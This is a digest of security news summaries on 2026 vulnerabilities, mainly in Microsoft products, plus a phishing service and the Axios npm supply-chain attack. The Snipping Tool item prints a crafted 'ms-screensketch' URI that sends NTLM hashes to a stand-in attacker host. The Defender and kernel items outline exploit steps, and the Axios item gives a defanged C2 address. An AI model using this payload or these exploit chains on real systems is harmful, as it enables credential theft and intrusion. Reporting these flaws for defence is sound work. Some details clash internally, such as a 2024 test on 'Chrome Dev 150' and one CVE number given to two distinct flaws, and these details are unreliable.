Microsoft Patches Critical Information Disclosure Flaw in Teams for Android (CVE-2026-42835) On June 9, 2026, Microsoft disclosed a high-severity vulnerability in Microsoft Teams for Android (CVE-2026-42835) that could allow authenticated attackers to expose sensitive data remotely. The flaw, rated Important with a CVSS 3.1 base score of 8.1, stems from improper input sanitization (CWE-74), enabling attackers to extract small portions of heap memory without user interaction. The vulnerability is remotely exploitable over the internet (AV:N) with low attack complexity (AC:L), meaning attackers require minimal system knowledge to craft a successful payload. While the flaw does not impact integrity, it poses high risks to confidentiality and availability, as heap memory may contain authentication tokens, session data, or cached credentials. Exploitation requires only low-privileged access, increasing the potential attack surface. Microsoft’s assessment indicates exploitation is less likely, with no evidence of active attacks or public exploit code at the time of disclosure. The company has released a patch via the Google Play Store, urging users and enterprises to update immediately. The vulnerability was responsibly reported by Ofek Levin of Enclave through Microsoft’s coordinated disclosure program. Given Teams’ role in enterprise communications, organizations handling sensitive data should prioritize applying the fix to mitigate exposure.

Microsoft Discloses Zero-Day Privilege Escalation Flaw in Windows CTFMON Microsoft has revealed a zero-day vulnerability in the Windows Collaborative Translation Framework (CTFMON), tracked as CVE-2026-45586, which could allow attackers to escalate privileges on affected systems. The flaw, disclosed on June 9, 2026, carries a CVSS score of 7.8 and is rated "Important." The vulnerability stems from improper link resolution (CWE-59) in the CTFMON component, enabling attackers to exploit symbolic link handling to redirect operations to unintended files or locations. Since CTFMON.exe a core Windows process managing input services like speech and handwriting recognition operates with elevated privileges in certain contexts, successful exploitation could grant attackers high-level system access. Exploitation requires local access with low privileges, but the attack complexity is low, and no user interaction is needed, making it a viable post-compromise technique. Once exploited, attackers could execute arbitrary code, manipulate system files, or maintain persistent access. The CVSS vector (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) confirms high impact across confidentiality, integrity, and availability. While there is no public evidence of active exploitation, the zero-day classification suggests the flaw may have been previously known or used. Security researchers note that such link-following vulnerabilities are often chained with initial access vectors (e.g., phishing or malware) to fully compromise systems. Microsoft has released security updates to address the issue. Organizations are advised to monitor for suspicious file operations, unusual privilege escalations, and abnormal CTFMON.exe activity as potential indicators of exploitation. The disclosure underscores the risks posed by core Windows components and the need for timely patching and threat monitoring.

Microsoft Patches Critical BitLocker Bypass Vulnerability in June 2026 Update On June 9, 2026, Microsoft disclosed CVE-2026-50507, a security feature bypass vulnerability in Windows BitLocker that allows attackers with physical access to circumvent device encryption and access sensitive data. The flaw, classified as CWE-306 (Missing Authentication for Critical Function), stems from a failure in BitLocker’s authentication checks, enabling unauthorized access without user interaction or elevated privileges. The vulnerability affects a wide range of Windows versions, including: - Windows 10 (1607, 1809, 21H2, 22H2) - Windows 11 (23H2, 24H2, 25H2, 26H1) - Windows Server (2012 R2 through 2025) With a CVSS v3.1 score of 6.8 (Important), the flaw is rated "Exploitation More Likely" due to its low attack complexity and the public availability of proof-of-concept code. While no active exploitation has been reported, the risk of real-world abuse is heightened by the vulnerability’s disclosure before patches were released. Microsoft addressed the issue in its June 2026 Patch Tuesday updates, releasing fixes via KB5094041, KB5094122, KB5094123, KB5094126, KB5094127, KB5094128, and KB5095051. Organizations relying on TPM-only BitLocker configurations are particularly vulnerable, as physical access alone may be sufficient to bypass encryption. The flaw underscores the importance of multi-factor BitLocker protections (e.g., TPM+PIN) and reinforced physical security measures for devices handling sensitive data. Security teams are advised to prioritize patch deployment, verify BitLocker integrity post-update, and implement compensating controls for unpatched systems.

Microsoft Shuts Down 70+ GitHub Repositories Following Malware Attack Targeting AI Coding Tools Microsoft has taken the rare step of disabling over 70 of its own GitHub repositories including those tied to Azure and AI coding agents after discovering a data breach involving credential-stealing malware. According to cybersecurity researchers and a statement provided to 404 Media, attackers compromised repositories to distribute malicious code designed to harvest credentials when opened in AI-assisted development tools like Claude Code and Gemini CLI. The breach’s full scope remains unclear, but researchers identified a specific compromised package linked to the attack. Microsoft’s response underscores the severity of the incident, as the company rarely takes such sweeping action against its own repositories. Separately, surveillance firm SignalTrace has drawn attention for its product, which correlates Bluetooth and other device data with license plate readers to track individuals and their vehicles. The tool, marketed to law enforcement, raises privacy concerns by linking personal devices to physical locations. The incidents highlight growing risks in both software supply chain security and commercial surveillance technologies. Microsoft’s investigation is ongoing.

Microsoft Patches Critical Microsoft Edge Vulnerabilities Enabling Remote Code Execution Microsoft has released a security update addressing three critical vulnerabilities in Microsoft Edge that could allow attackers to execute arbitrary code on vulnerable systems. The most severe flaw, CVE-2026-45495 (CVSS 7.5), enables remote code execution if a user opens a malicious file or visits a crafted webpage. Exploitation could grant attackers control over a system in the context of the logged-in user. Two additional vulnerabilities were also patched: - CVE-2026-45494 (CVSS 5.0): A navigation-handling weakness that permits cross-origin script injection, requiring user interaction. - CVE-2026-45492 (CVSS 4.3): An insufficient origin validation issue in cross-device managed sign-in, which could expose restricted functionality and be chained with other exploits. These vulnerabilities affect Microsoft Edge installations and highlight the risks of browser-based attacks, which are frequently weaponized once details become public. The update mitigates potential exploitation by remote attackers.

Critical Windows Netlogon RCE Vulnerability (CVE-2026-41089) Under Active Exploitation A severe Windows Netlogon remote code execution (RCE) vulnerability, tracked as CVE-2026-41089, is now being actively exploited in the wild, posing a major threat to unpatched Windows Server environments. The flaw affects domain controllers, allowing unauthenticated attackers to execute arbitrary code with SYSTEM-level privileges by sending specially crafted Netlogon network requests. Exploitation requires only network access to a vulnerable domain controller’s Netlogon service, making it a high-risk zero-click attack vector. The vulnerability highlights a growing trend where threat actors target overlooked gaps such as drivers, update services, and misconfigurations rather than relying solely on zero-day exploits. Security researchers confirm that attacks are already underway, underscoring the urgency for organizations to apply available patches. The flaw’s combination of no user interaction required and privilege escalation to SYSTEM makes it particularly dangerous for enterprise networks.

Google’s Chromium Bug Leak Exposes Unfixed JavaScript Execution Flaw Google accidentally leaked details of an unfixed vulnerability in Chromium that allows JavaScript to run persistently in the background even after the browser is closed enabling remote code execution (RCE) on affected devices. The flaw, reported by security researcher Lyra Rebane in December 2022, was initially acknowledged but remains unresolved despite multiple attempts to patch it. The vulnerability stems from a malicious webpage exploiting a Service Worker to maintain active JavaScript execution. Attackers could use this to turn browsers into unwitting participants in a botnet, capable of launching DDoS attacks, proxying malicious traffic, or redirecting users to targeted sites. Rebane demonstrated that the exploit could silently persist in Microsoft Edge without triggering download prompts, making it harder to detect. The issue affects all Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, Opera, Vivaldi, and Arc. Despite being marked as "fixed" in February 2024 under Google’s Vulnerability Rewards Program (VRP) with Rebane awarded a $1,000 bounty the patch was incomplete. On May 20, 2024, after the bug’s details were mistakenly made public, Rebane confirmed the exploit still worked in Chrome Dev 150 and Edge 148, calling it a "completely silent JS RCE" that activates from a single website visit. While the flaw does not bypass browser security boundaries or grant access to emails, files, or the host OS, its public exposure increases the risk of widespread exploitation. Google has since reclassified the issue as private, but the leak may accelerate the release of an emergency fix. No official response from Google has been provided as of publication.

Microsoft Warns of Actively Exploited Exchange Server Vulnerability (CVE-2026-42897) Microsoft has issued an urgent security alert for a critical spoofing vulnerability in on-premises Exchange Server, tracked as CVE-2026-42897, which is already being exploited in the wild. With a CVSS score of 8.1, the flaw affects Exchange Server 2016, 2019, and the Subscription Edition, allowing threat actors to execute arbitrary JavaScript in a user’s browser via a malicious email. The vulnerability stems from improper input neutralization in Outlook Web Access (OWA), enabling attackers to conduct cross-site scripting (XSS) attacks without requiring administrative privileges. When a targeted user opens a crafted email in OWA, the payload triggers, potentially leading to session hijacking or browser data manipulation. Microsoft has released a temporary mitigation (M2.1.x) through the Exchange Emergency Mitigation Service, which is automatically applied for organizations with the service enabled. Those in air-gapped environments must manually deploy the Exchange on-premises Mitigation Tool. While the fix may disrupt Outlook Web Access Print Calendar functionality and inline image rendering, security experts recommend keeping it active until a permanent patch is released. A final security update is in development, with the Exchange Server Subscription Edition expected to receive it first. Older versions (2016 and 2019) will only receive patches if enrolled in the Extended Security Update program, prompting organizations to upgrade outdated deployments. Cloud-based Exchange Online users remain unaffected.

Critical Windows BitLocker Zero-Days Exposed in Researcher Retaliation A disgruntled security researcher has publicly released two unpatched Windows zero-day vulnerabilities YellowKey and GreenPlasma following a dispute with Microsoft over disclosure handling. The exploits, disclosed shortly after Microsoft’s recent Patch Tuesday, pose severe risks to enterprise and government systems running Windows 11, Server 2022, and Server 2025. ### YellowKey: Full BitLocker Encryption Bypass The more critical flaw, YellowKey, allows attackers with physical access to bypass BitLocker full-disk encryption in minutes. The exploit targets the Windows Recovery Environment (WinRE), requiring only a malicious USB drive or direct manipulation of the EFI partition on the target system. By rebooting into WinRE with specific key combinations, attackers gain unrestricted access to encrypted volumes. Windows 10 remains unaffected due to architectural differences. ### GreenPlasma: Local Privilege Escalation The second exploit, GreenPlasma, enables local privilege escalation by exploiting the Windows CTFMON service through arbitrary memory section creation. While the current proof-of-concept triggers a User Account Control (UAC) prompt, further weaponization could allow attackers to execute unauthorized commands with SYSTEM-level privileges, potentially leading to persistent OS compromise. ### Researcher Claims and Microsoft Response The researcher, who has previously clashed with Microsoft, alleges the vulnerabilities are intentional backdoors, publicly naming internal Microsoft threat groups (MSTIC and GHOST) in an unusual move. Microsoft has yet to release official patches, though security experts recommend custom BitLocker PINs and BIOS passwords as temporary mitigations. While the public proof-of-concept does not bypass TPM or PIN protections, organizations are advised to restrict physical access and monitor WinRE modifications until fixes are issued.

Microsoft 365 Android Apps Exposed User Tokens Due to Debug Flag Left in Production A critical vulnerability in multiple Microsoft 365 Android apps dubbed FlagLeft by security researchers allowed unauthorized apps on the same device to obtain user account tokens, granting access to emails, files, calendars, and messages without authentication. The flaw stemmed from a debug flag (`setIsDebugMode(true)`) mistakenly left enabled in production builds, bypassing a security check designed to restrict token sharing to trusted Microsoft apps. Affected apps included Word, PowerPoint, Excel, Microsoft 365 Copilot, Microsoft Loop, and OneNote, collectively boasting billions of downloads. Microsoft Teams was unaffected, as its build had the flag disabled. The issue originated from a shared Microsoft SDK, meaning the same vulnerability appeared across all impacted apps. The exposed tokens FOCI (Family of Client IDs) refresh tokens enabled persistent access, as they could be refreshed and reused over time. Attackers could exploit the flaw by installing a malicious app on the target device, with no visible signs of compromise for the user. Researchers at Enclave demonstrated a proof-of-concept attack, successfully extracting tokens and accessing email via an unverified third-party app. Microsoft addressed the issue on May 12, assigning four CVEs: - CVE-2026-41100 (Microsoft 365 Copilot, CVSS 4.4) - CVE-2026-41101 (Word, CVSS 7.1) - CVE-2026-41102 (PowerPoint, CVSS 7.1) - CVE-2026-42832 (Excel, CVSS 7.7) Loop and OneNote were also patched but did not receive separate CVEs in the May release. The fixed Word build (16.0.19822.20190) and corresponding updates for other apps were distributed via Google Play. Microsoft’s Patch Tuesday notes indicated no prior public disclosure or exploitation of the flaw. While the patch closes the vulnerability, it does not invalidate tokens already obtained by attackers. Organizations managing Android fleets are advised to revoke refresh tokens for accounts on devices that ran vulnerable builds alongside untrusted apps to ensure full remediation.

Critical Windows DNS Client Vulnerability (CVE-2026-41096) Exposes Enterprise Networks to Remote Code Execution A newly disclosed critical vulnerability in Microsoft’s Windows DNS Client, tracked as CVE-2026-41096, enables attackers to execute malicious code remotely across enterprise networks with minimal effort. The flaw, rated 9.8 on the CVSS scale, stems from a heap-based buffer overflow in the DNSAPI.dll component a core system file responsible for processing DNS responses on nearly all modern Windows machines. Exploitation requires no user interaction or authentication; attackers need only send a maliciously crafted DNS response to a vulnerable system. Common triggers include routine network activities, such as browsing the web, establishing VPN connections, or checking for software updates. Once exploited, the flaw allows arbitrary code execution, potentially granting attackers control over affected endpoints. The vulnerability’s impact is amplified by its broad attack surface: compromised routers, rogue local servers, poisoned DNS resolvers, or hostile public Wi-Fi networks could all serve as entry points. Since the flaw resides in the client-side DNS processing rather than server infrastructure both workstations and enterprise servers are at risk. This creates a significant risk of lateral movement within corporate networks if internal systems remain unpatched. Microsoft released a fix on May 12, 2026, as part of its Patch Tuesday updates, addressing the issue across Windows 11, Windows Server 2022, and Windows Server 2025. While the company currently assesses exploitation as unlikely, the sheer number of vulnerable machines makes this a high-priority threat for security teams. Organizations unable to apply the patch immediately are advised to restrict outbound DNS traffic to trusted resolvers and monitor for suspicious processes spawned by network services.

PhantomRPC: New Windows RPC Vulnerability Enables SYSTEM-Level Privilege Escalation A newly discovered architectural vulnerability, dubbed PhantomRPC, exposes a critical flaw in Windows Remote Procedure Call (RPC) that allows attackers to escalate privileges to SYSTEM-level access across all Windows versions. Unlike traditional memory corruption or logic-based exploits, PhantomRPC stems from a design weakness in how the Windows RPC runtime handles connections to unavailable servers. When a privileged process initiates an RPC call to an offline or disabled server, the runtime fails to verify the legitimacy of the responding server. This oversight enables attackers to impersonate the intended RPC server, bypassing security controls and gaining elevated privileges. The vulnerability affects the core RPC infrastructure, making it a widespread risk for Windows environments. Security researchers have highlighted the potential for exploitation in both enterprise and consumer systems, though no active attacks have been confirmed at this time. Microsoft has not yet released a patch, leaving organizations reliant on mitigations such as restricting RPC server access and monitoring for unusual activity. The discovery underscores the growing threat of architectural flaws in foundational system components.

Critical Zero-Day "RedSun" Exploit Grants SYSTEM-Level Access in Microsoft Defender A newly disclosed zero-day vulnerability, dubbed RedSun, enables unprivileged users to escalate privileges to full SYSTEM-level access on fully patched Windows 10, Windows 11, and Windows Server 2019 and later systems. The flaw remains unpatched as of April 2026. Discovered by security researcher Chaotic Eclipse (also known as Nightmare-Eclipse), RedSun is the second zero-day exploit targeting Microsoft Defender in two weeks. The first, BlueHammer (CVE-2026-33825), was patched in Microsoft’s April 2026 Patch Tuesday updates. Unlike its predecessor, RedSun exploits a distinct attack vector, suggesting deeper architectural weaknesses in Defender. The exploit leverages a logic flaw in Defender’s cloud file handling mechanism. When Defender detects a malicious file with a cloud tag, it rewrites the file to its original location instead of quarantining it. RedSun manipulates this behavior by: 1. Writing an EICAR test file via the Windows Cloud Files API (cldapi.dll). 2. Using an opportunistic lock (oplock) to pause Defender’s file restoration. 3. Redirecting the write path to C:\Windows\System32 via NTFS directory junctions and reparse points. 4. Overwriting a critical system binary (e.g., TieringEngineService.exe) with SYSTEM privileges. 5. Executing the compromised binary to gain full SYSTEM-level access. Independent researcher Will Dormann of Tharros confirmed the exploit’s reliability on fully patched systems, including Windows 10, Windows 11, and Windows Server 2019 and later. The vulnerability, tracked as CVE-2026-33825 with a CVSS score of 7.8 (High), is classified under CWE: Insufficient Granularity of Access Control and aligns with MITRE ATT&CK’s Privilege Escalation (TA0004). While the full proof-of-concept (PoC) code has not been publicly released, the exploit methodology is documented on GitHub. Microsoft has yet to issue a patch, leaving systems with Defender enabled and cldapi.dll present vulnerable. Security teams are monitoring for anomalous Defender file write activity, particularly oplock-assisted redirections to C:\Windows\System32.

Microsoft Patches Zero-Day Privilege Escalation Flaw in Defender Antimalware Platform On April 14, 2026, Microsoft released security updates to address a newly disclosed zero-day vulnerability (CVE-2026-33825) in its Defender Antimalware Platform. The flaw, rated "Important," enables attackers with local access to escalate privileges to SYSTEM-level permissions, granting full control over affected Windows machines. The vulnerability stems from insufficient access-control granularity (CWE-1220) in Defender’s user-mode binaries (e.g., MsMpEng.exe) and kernel-mode drivers. Exploitation requires only low privileges and no user interaction, making it a high-risk threat. Once exploited, attackers could disable security tools, deploy persistent malware, exfiltrate sensitive data, or create administrative accounts. Key Details: - CVSS Score: 7.8 (High) - Attack Vector: Local (attacker must already have access) - Complexity: Low (easy to exploit) - Affected Versions: Platform versions up to 4.18.26020.6 - Patch Version: 4.18.26030.3011 Security researchers Zen Dodd and Yuanpei Xu reported the flaw, which Microsoft confirms has not been exploited in the wild though exploitation is deemed "More Likely" as threat actors develop exploit code. Notably, vulnerability scanners may flag systems with disabled Defender as vulnerable, though Microsoft clarifies these are not exploitable unless Defender is active. The patch is automatically deployed in most environments, but organizations should verify updates via Windows Security > Virus & threat protection > Protection Updates or check the Antimalware Client Version in settings. Administrators are advised to audit software distribution tools to ensure compliance across networks.

Critical Zero-Day in Microsoft SharePoint Server Actively Exploited On April 14, 2026, Microsoft confirmed active exploitation of a zero-day spoofing vulnerability (CVE-2026-32201) in Microsoft SharePoint Server as part of its monthly security updates. The flaw, rated 6.5 (Important) on the CVSS scale with a temporal score of 6.0, affects multiple versions of SharePoint Server due to improper input validation (CWE-20), allowing unauthenticated remote attackers to conduct spoofing attacks over a network. The vulnerability requires no privileges or user interaction, with a low attack complexity, making it an accessible entry point for threat actors. Successful exploitation could enable attackers to view sensitive data and tamper with disclosed information, though system availability remains unaffected. Despite a low individual impact on confidentiality and integrity, the confirmed active exploitation and lack of authentication requirements significantly increase real-world risk. Microsoft’s advisory flags the flaw as "Exploitation Detected", with functional exploit code and confirmed report confidence, indicating it was weaponized as a true zero-day before disclosure. The company released emergency patches for all affected versions: - SharePoint Server Subscription Edition (KB5002853, Build 16.0.19725.20210) - SharePoint Server 2019 (KB5002854, Build 16.0.10417.20114) - SharePoint Enterprise Server 2016 (KB5002861, Build 16.0.5548.1003) Given SharePoint’s widespread enterprise adoption, the vulnerability presents a high-value target for nation-state actors and financially motivated threat groups. Spoofing flaws in collaboration platforms can facilitate lateral movement, credential harvesting, or business email compromise (BEC) attacks. Organizations with on-premises deployments particularly those using 2016 or 2019 versions are advised to prioritize patching due to confirmed in-the-wild exploitation. Microsoft credited coordinated disclosure efforts from the security community in addressing the flaw.

Microsoft Discloses Critical Active Directory Vulnerability (CVE-2026-33826) with High Exploitation Risk Microsoft has revealed a critical vulnerability in Windows Active Directory, tracked as CVE-2026-33826, which could allow authenticated attackers to execute malicious code remotely within enterprise networks. The flaw stems from improper input validation (CWE-20) in the Active Directory component and has been assigned a CVSS v3.1 score of 8.0, reflecting its high impact on confidentiality, integrity, and availability. The vulnerability enables remote code execution (RCE) via crafted Remote Procedure Calls (RPC) sent by an attacker with basic domain-level credentials. While exploitation requires adjacent network access meaning it cannot be triggered over the internet it poses a severe risk to organizations with shared domain connectivity or insufficient internal segmentation. The attack complexity is low, requiring minimal setup and no victim interaction, while successful exploitation grants system-level privileges equivalent to the RPC host. Though no public exploit code has been detected, Microsoft warns that exploitation is "more likely" due to the potential for threat actors to reverse-engineer the patch. The flaw was responsibly disclosed by security researcher Aniq Fakhrul, a contributor to Microsoft’s vulnerability disclosure programs. Affected Systems: - Windows Server 2012 R2 - Windows Server 2016 - Windows Server 2019 - Windows Server 2022 (including 23H2) - Windows Server 2025 Both standard and Server Core installations are vulnerable. Microsoft released fixes as part of its April 2026 Patch Tuesday, with patches including KB5082063 (Server 2025) and KB5082142 (Server 2022). Organizations are advised to prioritize patching, monitor RPC traffic for anomalies, and audit Active Directory access logs to mitigate risks.

Microsoft Patches Critical BitLocker Vulnerability in Windows Server Systems Microsoft has released security updates to address CVE-2026-27913, a high-severity vulnerability in Windows BitLocker that allows attackers to bypass critical security protections. Discovered by researcher Alon Leviev in collaboration with Microsoft’s STORM team, the flaw stems from improper input validation (CWE-20) in BitLocker’s data processing, enabling unauthorized local access to circumvent Secure Boot. The vulnerability carries a CVSS score of 7.7, indicating significant risk. Exploitation requires local access but demands low complexity, no user interaction, and no elevated privileges. A successful attack could compromise confidentiality and integrity, allowing threat actors to bypass Secure Boot a foundational UEFI security protocol leading to unauthorized system modifications, hardware-level attacks, and access to encrypted data. Affected systems include Windows Server 2012, 2012 R2, 2016, 2019, and 2022, as well as Server Core installations. Microsoft has classified the flaw as "Important" and warns that exploitation is likely in the near future, though no active attacks or public exploit code have been observed. The fix was released as part of April 2026’s Patch Tuesday updates. Organizations are advised to deploy the latest cumulative security updates and enforce physical security controls to mitigate risk. Continuous monitoring for emerging exploit proofs is also recommended.

Microsoft Snipping Tool Vulnerability Exposes NTLM Hashes via Deep Link Abuse A newly disclosed vulnerability in Microsoft’s Snipping Tool, tracked as CVE-2026-33829, allows attackers to capture NTLM authentication hashes through network spoofing. Discovered by security researcher Margaruga of BlackArrowSec Red Team, the flaw exploits improper validation in the app’s `ms-screensketch` deep link protocol. The vulnerability stems from the `filePath` parameter, which can force Windows to connect to a remote SMB share when a crafted URI is opened. This triggers an NTLM authentication attempt, leaking the user’s hashed credentials to an attacker-controlled server. Exploitation requires minimal user interaction such as clicking a malicious link or visiting a compromised webpage making it a potent vector for social engineering attacks. BlackArrowSec demonstrated the attack using a URI like: ``` ms-screensketch:edit?&filePath=\\attacker.lab\image.png&isTemporary=false&saved=true&source=Toast ``` When executed, the Snipping Tool initiates an SMB connection, exposing the NTLM response. Attackers could disguise malicious links as legitimate files (e.g., company wallpapers or ID photos), tricking users into triggering the leak. While the flaw does not grant direct system access, stolen NTLM hashes can enable impersonation, lateral movement, or privilege escalation in enterprise environments. Microsoft addressed the issue in its April 14, 2026, security update, following a disclosure on March 23, 2026. Technical details and a proof-of-concept were published by BlackArrowSec on April 15, 2026, with additional resources available in their [GitHub advisory](https://github.com/BlackArrowSec/redteam-research).

New Phishing-as-a-Service Platform "VENOM" Targets C-Suite Executives A previously undocumented phishing-as-a-service (PhaaS) platform, dubbed VENOM, has been actively targeting high-level executives including CEOs, CFOs, and VPs across multiple industries since at least November 2023. The operation, uncovered by researchers at Abnormal, remains closed-access, avoiding public promotion on underground forums and limiting visibility to security teams. VENOM’s attack chain begins with highly personalized phishing emails impersonating Microsoft SharePoint document-sharing notifications. These messages include fake email threads, HTML noise, and Unicode-rendered QR codes to evade detection. The QR codes, designed to shift the attack to mobile devices, contain double Base64-encoded email addresses in URL fragments preventing server-side logging and reputation-based blocking. When scanned, the QR code directs victims to a filtering landing page that screens for security researchers and sandboxed environments. Legitimate targets are redirected to a credential-harvesting page that proxies Microsoft’s login flow in real time, capturing credentials, multi-factor authentication (MFA) codes, and session tokens via an adversary-in-the-middle (AiTM) technique. VENOM also employs a device-code phishing tactic, tricking victims into approving access for a rogue device a method gaining popularity due to its resistance to password resets. At least 11 phishing kits now offer this option. In both attack flows, VENOM establishes persistent access by registering new devices or obtaining tokens, bypassing traditional MFA protections. Researchers emphasize that while MFA remains critical, FIDO2 authentication, disabling unused device-code flows, and stricter conditional access policies are necessary to mitigate such threats.

Zero-Day "BlueHammer" Exploit Publicly Released, Exposing Windows Systems to Privilege Escalation A security researcher operating under the alias Nightmare-Eclipse has publicly disclosed a previously unknown Windows zero-day vulnerability, dubbed BlueHammer, along with proof-of-concept (PoC) exploit code. The flaw enables local privilege escalation (LPE), allowing attackers to gain elevated access on affected systems. The exploit was released earlier this week via a blog post and GitHub repository, with the researcher expressing frustration over Microsoft’s handling of vulnerability reports. While the disclosure lacked a detailed technical breakdown, independent validation confirmed its effectiveness. Security researcher Will Dormann verified that the exploit successfully escalates privileges, enabling non-administrative users to spawn SYSTEM-level command prompts though success rates vary and are not 100% reliable. Testing revealed inconsistencies across Windows versions, including Windows Server 2022 and 2025, where the exploit sometimes grants administrative rather than full SYSTEM access. The PoC appears to target Windows Defender-related interfaces, though the exact vulnerability mechanism remains undocumented. Microsoft has not yet acknowledged the flaw or released a patch, leaving systems exposed. With exploit code now publicly available, threat actors could rapidly integrate it into malware or post-exploitation toolkits. The vulnerability poses a significant risk, particularly when chained with initial access vectors like phishing or remote code execution. No official mitigations are currently available, though security researchers emphasize monitoring for unusual SYSTEM-level process creation and interactions with Windows Defender components.

Critical Zero-Day Vulnerability in Google Chrome Exploited in the Wild A newly discovered zero-day vulnerability in Google Chrome, tracked as CVE-2026-5281, is under active exploitation, posing severe risks to users globally. The flaw, a Use-After-Free (UAF) bug in Google Dawn an open-source WebGPU implementation allows attackers to bypass security protections and execute arbitrary code on affected systems. The vulnerability was added to the Known Exploited Vulnerabilities (KEV) catalog on April 1, 2026, prompting urgent calls for updates. Exploitation requires tricking a victim into visiting a malicious HTML page, which triggers the UAF bug, enabling attackers to compromise the system, steal data, or deploy malware. For enterprises, a single compromised browser could serve as an entry point for lateral movement across networks. While the advisory focuses on Google Chrome, the flaw affects all Chromium-based browsers, including Microsoft Edge, Opera, Vivaldi, and Brave, due to its presence in the underlying engine. Security researchers have not yet confirmed whether the vulnerability is being used in ransomware campaigns, but its active exploitation elevates it to a high-priority threat. The Cybersecurity and Infrastructure Security Agency (CISA) has mandated Federal Civilian Executive Branch (FCEB) agencies to mitigate the risk by April 15, 2026, under Binding Operational Directive (BOD) 22-01. Organizations and users are advised to apply vendor-provided patches immediately, prioritize browser updates in patch management cycles, and discontinue use of unpatched versions if mitigations are unavailable.

Critical Windows Kernel Flaw (CVE-2026-40369) Enables SYSTEM-Level Privilege Escalation A newly disclosed Windows kernel vulnerability, CVE-2026-40369, allows attackers to achieve full SYSTEM-level privilege escalation even from highly restricted environments like browser sandboxes. Discovered by security researcher Ori Nimron, the flaw affects Windows 11 versions 24H2 through 25H2 and resides in the ntoskrnl.exe component, specifically within the ExpGetProcessInformation function. The vulnerability is 100% deterministic, requiring only a single system call from an unprivileged process to manipulate kernel memory. The issue stems from the NtQuerySystemInformation syscall (information class 253, SystemProcessInformationExtension), which bypasses ProbeForWrite validation when invoked with a zero-length buffer. This allows attackers to supply arbitrary kernel memory addresses, enabling an arbitrary kernel-memory-increment primitive. Unlike traditional exploits, this flaw does not rely on race conditions, heap spraying, or token manipulation. Instead, it provides direct write access to kernel memory through a logic error, making it accessible from sandboxed environments like Chrome, Edge, and Firefox renderers a critical vector for browser escape attacks. ### Exploitation & Impact An attacker could exploit this vulnerability by: 1. Compromising a browser renderer process and invoking the vulnerable syscall. 2. Incrementing kernel structures to gain arbitrary read capabilities, bypassing Kernel Address Space Layout Randomization (KASLR). 3. Corrupting internal structures (e.g., CmpLayerVersions) to redirect kernel pointers into user-controlled memory. 4. Extracting sensitive kernel data, locating the EPROCESS structure, and modifying privilege bitmasks (e.g., enabling SeDebugPrivilege). 5. Injecting malicious code into high-privilege processes (e.g., winlogon.exe) to spawn a SYSTEM-level command shell. The flaw also exploits a broader architectural weakness: Windows’ lack of Supervisor Mode Access Prevention (SMAP), allowing the kernel to safely access user-mode memory during exploitation. This simplifies attacks by enabling attackers to map fake structures in user space without triggering faults. ### Disclosure & Patch Status Originally developed for Pwn2Own Berlin 2026, the vulnerability was publicly disclosed after the submission was rejected due to event capacity constraints. No official patch has been released, leaving affected Windows 11 systems exposed. Security teams are advised to monitor for unusual NtQuerySystemInformation usage and prepare for forthcoming updates. The discovery highlights persistent risks in kernel attack surfaces, even in well-audited code paths.

North Korean Threat Actor Compromises Axios npm Packages in Supply Chain Attack On March 31, 2026, Microsoft uncovered a supply chain compromise involving two malicious versions of the widely used JavaScript HTTP client, Axios (1.14.1 and 0.30.4). The attack, attributed to North Korean state-backed threat actor Sapphire Sleet, introduced a hidden dependency [email protected] that executed silently during npm installation via lifecycle hooks. The malicious dependency did not alter Axios’s core functionality but instead contacted attacker-controlled command-and-control (C2) infrastructure (hxxp://sfrclak[.]com:8000/6202033, hosted on IP 142.11.206[.]73) to deploy a second-stage remote access trojan (RAT). The attack targeted developer workstations, CI/CD pipelines, and production systems, leveraging Axios’s broad adoption to maximize impact. ### Attack Mechanics To evade detection, the threat actor first released a benign version ([email protected]) before publishing the malicious 4.2.1, which included an install-time script (setup.js) and a decoy manifest. The compromised Axios versions bypassed standard CI-backed publishing processes, adding the rogue dependency without triggering alarms. During installation, the post-install hook executed setup.js, which: - Fingerprinted the platform (Windows, macOS, or Linux) via encoded POST requests. - Downloaded tailored payloads from the C2, including: - macOS: A native binary (com.apple.act.mond) dropped in /Library/Caches, executed via zsh. - Windows: A PowerShell RAT (6202033.ps1) persisted via a hidden Run registry key, masquerading as wt.exe. - Linux: A Python-based RAT (ld.py) executed with nohup to suppress output. - Self-cleaned by deleting its loader and replacing it with a sanitized manifest to minimize forensic traces. ### Attribution & Impact Microsoft’s Threat Intelligence linked the infrastructure and tactics to Sapphire Sleet, a North Korean group known for financially motivated operations targeting cryptocurrency and fintech sectors. The attack exploited npm’s auto-update mechanisms, allowing malware to spread undetected across environments where Axios was a dependency. ### Mitigation & Response Microsoft Defender detected the activity and deployed protections to block the malicious components. Recommended actions included: - Rotating exposed secrets and downgrading to safe Axios versions (1.14.0 or 0.30.3). - Removing malicious artifacts and reinstalling clean packages. - Hardening npm usage by disabling auto-upgrades, pinning exact versions, and restricting dependency bots. - Monitoring for outbound connections to sfrclak[.]com or 142.11.206[.]73:8000. - Adopting Trusted Publishing with OIDC to reduce account takeover risks. The incident highlights the risks of supply chain attacks, where a single compromised dependency can serve as a cross-platform malware delivery vector.

High-Severity "RegPwn" Windows Vulnerability Grants SYSTEM Access to Attackers A newly disclosed high-severity Windows vulnerability, tracked as CVE-2026-24291 and dubbed "RegPwn," enables low-privileged users to escalate privileges and gain full SYSTEM-level access on affected systems. The flaw exploits the way Windows handles its built-in accessibility features, including the On-Screen Keyboard and Narrator. When a user launches these tools, Windows creates a registry key to store configuration data. Attackers can manipulate this process to bypass security controls, leveraging the high-integrity access granted to accessibility features originally designed to assist users but now weaponized for privilege escalation. The vulnerability affects multiple Windows versions, though specific details on affected builds and patches remain undisclosed. Security researchers warn that successful exploitation could allow threat actors to execute arbitrary code with the highest system privileges, potentially leading to full system compromise. No active exploitation has been confirmed in the wild, but the severity of the flaw underscores the risks of misconfigured or improperly secured system components. Microsoft has not yet released a public advisory or patch for CVE-2026-24291.

